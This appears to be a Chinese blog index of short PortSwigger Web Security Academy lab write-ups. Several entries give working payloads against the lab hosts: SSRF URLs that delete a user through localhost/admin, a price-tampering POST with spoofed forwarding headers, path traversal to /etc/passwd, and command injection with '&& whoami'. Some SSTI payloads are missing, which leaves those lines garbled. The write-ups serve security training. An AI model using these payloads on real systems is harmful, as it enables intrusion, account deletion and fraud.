資訊安全

Lab: Basic SSRF against the local server 題目敘述 This lab has a stock check feature which fetches data from an internal system. To solve the lab, change the stock check URL to access the admin interface at http://localhost/admin and delete the user carlos. 題目解釋 任意發 HTTP GET Request 解答 觀察 Stock check 的 API 發現他會去戳 http%3A%2F%2Fstock.weliketoshop.net%3A8080%2Fproduct%2Fstock%2Fcheck%3FproductId%3D1%26storeId%3D1 改送 http%3a%2f%2flocalhost%2fadmin 發現就能看到 admin 介面 再送 http%3A%2F%2Flocalhost%2Fadmin%2Fdelete%3Fusername%3Dcarlos Lab: Basic SSRF against another back-end system 題目敘述 This lab has a stock check feature which fetches data from an internal system. ...

Lab: Excessive trust in client-side controls 題目敘述 This lab doesn’t adequately validate user input. You can exploit a logic flaw in its purchasing workflow to buy items for an unintended price. To solve the lab, buy a “Lightweight l33t leather jacket”. You can log in to your own account using the following credentials: wiener:peter 題目解釋 竄改 POST 內容 解答 在加入購物車時會順便 POST 價格 POST /cart HTTP/1.1 Host: acd31fa31fe0b3dcc04314f500560069.web-security-academy.net Cookie: session=IxPR6nrwBtk0VSUHVKPDmBuwG2IJVK8z User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 49 Origin: https://acd31fa31fe0b3dcc04314f500560069.web-security-academy.net Referer: https://acd31fa31fe0b3dcc04314f500560069.web-security-academy.net/product?productId=1 Upgrade-Insecure-Requests: 1 X-Forwarded-For: 127.0.0.1 X-Originating-Ip: 127.0.0.1 X-Remote-Ip: 127.0.0.1 X-Remote-Addr: 127.0.0.1 Te: trailers Connection: close productId=1&redir=PRODUCT&quantity=1&price=133700 竄改成 1 再去購物車結帳就好ㄌ ...

Lab: Manipulating WebSocket messages to exploit vulnerabilities 題目敘述 This online shop has a live chat feature implemented using WebSockets. Chat messages that you submit are viewed by a support agent in real time. To solve the lab, use a WebSocket message to trigger an alert() popup in the support agent’s browser. 題目解釋 練習用 Burp 抓 Websockets 解答 用 Burp 抓包後，上面有一個 Websockets history 把資料丟到 Repeater 之後改輸入 {"user":"You","content":" "} Lab: Manipulating the WebSocket handshake to exploit vulnerabilities 題目敘述 This online shop has a live chat feature implemented using WebSockets. ...

Lab: Unprotected admin functionality 題目敘述 This lab has an unprotected admin panel. Solve the lab by deleting the user carlos. 題目解釋 沒有限制的 admin 面板 解答 從 robots.txt 可以看到 /administrator-panel，進去刪帳號 Lab: Unprotected admin functionality with unpredictable URL 題目敘述 This lab has an unprotected admin panel. It’s located at an unpredictable location, but the location is disclosed somewhere in the application. Solve the lab by accessing the admin panel, and using it to delete the user carlos. ...

Lab: Basic server-side template injection 題目敘述 This lab is vulnerable to server-side template injection due to the unsafe construction of an ERB template. To solve the lab, review the ERB documentation to find out how to execute arbitrary code, then delete the morale.txt file from Carlos’s home directory. 題目解釋 題目說是 ERB 的 SSTI 解答 https://acc21f1d1e22b8ffc0390b0f0087005f.web-security-academy.net/ ?message= 會回傳 49 https://acc21f1d1e22b8ffc0390b0f0087005f.web-security-academy.net/ ?message= 可以取得使用者名稱 https://acc21f1d1e22b8ffc0390b0f0087005f.web-security-academy.net/ ?message= 順利刪除檔案 Lab: Basic server-side template injection (code context) 題目敘述 This lab is vulnerable to server-side template injection due to the way it unsafely uses a Tornado template. To solve the lab, review the Tornado documentation to discover how to execute arbitrary code, then delete the morale.txt file from Carlos’s home directory. ...

Lab: Information disclosure in error messages 題目敘述 This lab’s verbose error messages reveal that it is using a vulnerable version of a third-party framework. To solve the lab, obtain and submit the version number of this framework. 題目解釋 想辦法讓他噴 Error 可能可以洩漏版本號 解答 https://acf81fed1ef0e1cbc040196e00b300c0.web-security-academy.net/product?productId=asd 就會噴出 Apache Struts 2 2.3.31 Lab: Information disclosure on debug page 題目敘述 This lab contains a debug page that discloses sensitive information about the application. To solve the lab, obtain and submit the SECRET_KEY environment variable. ...

Lab: Remote code execution via web shell upload 題目敘述 This lab contains a vulnerable image upload function. It doesn’t perform any validation on the files users upload before storing them on the server’s filesystem. To solve the lab, upload a basic PHP web shell and use it to exfiltrate the contents of the file /home/carlos/secret. Submit this secret using the button provided in the lab banner. You can log in to your own account using the following credentials: wiener:peter ...

Lab: File path traversal, simple case 題目敘述 This lab contains a file path traversal vulnerability in the display of product images. To solve the lab, retrieve the contents of the /etc/passwd file. 題目解釋 圖片網址的地方可以任意讀檔，嘗試讀取 /etc/passwd。 解答 觀察一個圖片 https://ac801f311fe78ab8c0bf223f000500bf.web-security-academy.net/image?filename=11.jpg 修改 Filename https://ac801f311fe78ab8c0bf223f000500bf.web-security-academy.net/image?filename=../../../../../../../etc/passwd Lab: File path traversal, traversal sequences blocked with absolute path bypass 題目敘述 This lab contains a file path traversal vulnerability in the display of product images. The application blocks traversal sequences but treats the supplied filename as being relative to a default working directory. ...

Lab: OS command injection, simple case 題目敘述 This lab contains an OS command injection vulnerability in the product stock checker. The application executes a shell command containing user-supplied product and store IDs, and returns the raw output from the command in its response. To solve the lab, execute the whoami command to determine the name of the current user. 題目解釋 要執行 whoami，弱點在 stock checker 解答 Post 設定參數 productId=1%20%26%26%20whoami&storeId=3 Lab: Blind OS command injection with time delays 題目敘述 This lab contains a blind OS command injection vulnerability in the feedback function. ...

Lab: SQL injection UNION attack, determining the number of columns returned by the query 題目敘述 This lab contains an SQL injection vulnerability in the product category filter. The results from the query are returned in the application’s response, so you can use a UNION attack to retrieve data from other tables. The first step of such an attack is to determine the number of columns that are being returned by the query. You will then use this technique in subsequent labs to construct the full attack. To solve the lab, determine the number of columns returned by the query by performing an SQL injection UNION attack that returns an additional row containing null values. ...